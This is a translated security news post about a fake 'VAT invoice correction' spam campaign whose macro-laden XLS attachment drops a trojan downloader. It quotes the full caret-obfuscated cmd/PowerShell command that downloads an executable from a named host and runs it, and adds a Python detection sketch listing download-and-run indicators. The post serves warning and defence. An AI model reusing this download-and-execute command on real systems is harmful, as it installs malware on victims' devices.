Beware of spam "VAT invoice correction"

Our reader, who wishes to remain anonymous, has provided us with a sample of the latest spam campaign, in which the fraudster tries to extort several hundred zlotys (from 350 to 850, according to several confirmed variants of the spam) from random recipients. The spam primarily reaches corporate email addresses.

The malware is hidden in an attachment in the form of an XLS file containing macros. Under the pretext of an issued invoice correction, the fraudster deliberately prepared the document so that it appears to contain hidden information (the line items of purchased goods and services) which can only be viewed by enabling the macro content:

The fake invoice that was attached.

Before the infection process even starts, the only thing protecting the user is common sense and reading messages carefully. By default, the Microsoft Office suite warns you when you try to run macros:


Excel's preventive security warning is the last line of defense.

The trojan-downloader lies in wait for careless users: enabling the protected content triggers the VBA (Visual Basic for Applications) code, the programming language used for macros.

The malicious macro runs the CMD interpreter with the parameters:

CMd.exe / c "PO ^ WEr ^ shE ^ lL ^ .ex ^ e ^ -ex ^ E ^ Cutio ^ NPoL ^ IcY ^ by ^ p ^ ass ^ -n ^ o ^ p ^ ro ^ fi ^ l ^ e ^ - ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^. do ^ wnloa ^ df ^ i ^ l ^ e ('https://farmona.co/ncb.exe','%appdata%.exe') ^; ^ star ^ t-proc ^ ess ^ '% appdata % .exe '' 

The CMD command line in turn invokes the powershell.exe interpreter, which downloads the malware from hxxp://farmona.co/ncb.exe, saves it in the %appdata% location under a random name with the .EXE extension (in our case the name was "Roaming.exe") and infects the user's device. It is probably ransomware, although we have not yet confirmed this.
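As an added illustration (not code from the AVLab post), the following Python sketch shows how a defender can normalize a caret-obfuscated cmd.exe command line of the kind quoted above and flag the PowerShell download-and-run indicators it carries. The sample command lines and the URL are constructed for the example, and the caret handling is a simplified model of cmd.exe's escaping.

```python
import re

# Constructed sample modelled on the caret-obfuscated command line quoted in
# the post; the host is a placeholder (.example TLD), not the real URL.
SAMPLE_CMDLINE = (
    'CMd.exe /c "PO^WEr^shE^lL^.ex^e -ex^E^Cutio^NPoL^IcY by^p^ass -n^o^p^ro^fi^l^e '
    "$wc.do^wnloa^df^i^l^e('https://malware.example/ncb.exe','%appdata%.exe')^; "
    "star^t-proc^ess '%appdata%.exe'\""
)
# Constructed benign line: a single caret used legitimately to escape '&'.
BENIGN_CMDLINE = 'cmd.exe /c "dir %appdata% ^& echo done"'

# Indicators matched against the normalized (de-escaped, lower-cased) line.
# PowerShell accepts unique prefixes of parameter names, so -ex / -nop are
# matched as prefixes, not only the full -ExecutionPolicy / -NoProfile.
INDICATORS = {
    "powershell": r"\bpowershell(\.exe)?\b",
    "executionpolicy bypass": r"-ex\w*\s+bypass\b",
    "noprofile": r"-nop\w*\b",
    "downloadfile": r"\.downloadfile\s*\(",
    "start-process": r"\bstart-process\b",
    "appdata exe": r"%appdata%[^\s'\"]*\.exe",
}

def strip_cmd_carets(cmdline: str) -> str:
    """Undo cmd.exe caret escaping (simplified model): '^' escapes the next
    character, so 'PO^WEr' -> 'POWEr' and '^^' -> '^'; a trailing '^' is dropped."""
    return re.sub(r"\^(.?)", r"\1", cmdline, flags=re.DOTALL)

def normalize_cmdline(cmdline: str) -> str:
    """De-escape, lower-case and collapse whitespace so obfuscated and plain
    spellings of the same command compare equal."""
    return re.sub(r"\s+", " ", strip_cmd_carets(cmdline)).strip().lower()

def analyze_cmdline(cmdline: str) -> dict:
    """Return the normalized line, the matched indicators and a verdict.
    Heavy caret use on its own is already unusual for legitimate commands."""
    norm = normalize_cmdline(cmdline)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, norm)]
    carets = cmdline.count("^")
    return {
        "normalized": norm,
        "indicators": hits,
        "caret_count": carets,
        "suspicious": carets >= 5 or len(hits) >= 3,
    }

if __name__ == "__main__":
    for line in (SAMPLE_CMDLINE, BENIGN_CMDLINE):
        print(analyze_cmdline(line))
```

The same normalization can be applied to process-creation telemetry (for example, Sysmon event ID 1 command lines) before matching, so the obfuscated and plain spellings hit the same rule.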

Not all antivirus programs detect this threat on the well-known VirusTotal service. The reasons for this should be sought in:

  • a different version of the antivirus engine being made available to VirusTotal than the one end users receive,
  • the scan engines available on VirusTotal possibly lacking mechanisms to detect macro viruses and scripts run through the system interpreters cmd.exe and powershell.exe (we wrote about this dependence in more detail today in this article on the new script activation technique in PowerPoint files).

Scan results on VT should be taken with a grain of salt. It would be very unfair to translate the results obtained there into the actual capabilities of individual security products.

We are dealing here with an attack spread across many stages. It starts with spam, moves on to macro viruses and malicious scripts run by digitally signed Microsoft binaries, and ends with downloading a malicious file from the network. For this reason, effective security software is one that protects many potential attack surfaces and focuses adaptive protection on at least some of the most important layers: from spam detection, through shellcode control and control of Internet traffic, to scanning web pages and scanning files downloaded over Internet protocols. Above all, however, good protection is one that verifies what "passes through" PowerShell (or other system script interpreters), a digitally signed file that a large share of antivirus software treats as trusted. In such cases, using reputable software with these protective functions is crucial.


We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.